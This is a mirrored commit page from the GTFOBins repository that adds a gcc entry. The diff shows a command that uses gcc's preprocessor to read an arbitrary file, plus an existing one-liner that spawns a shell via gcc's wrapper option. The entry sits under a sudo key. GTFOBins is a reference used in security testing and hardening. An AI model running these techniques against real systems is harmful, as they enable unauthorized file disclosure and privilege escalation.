mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add gcc file read
This is an improved version with respect to #138. Close #138.
This commit is contained in:
parent
c9f5c065c0
commit
04b29456a6
@ -1,5 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
gcc -x c -E "$LFILE"
|
||||
shell:
|
||||
- code: gcc -wrapper /bin/sh,-s .
|
||||
sudo:
|
||||
|
Loading…
Reference in New Issue
Block a user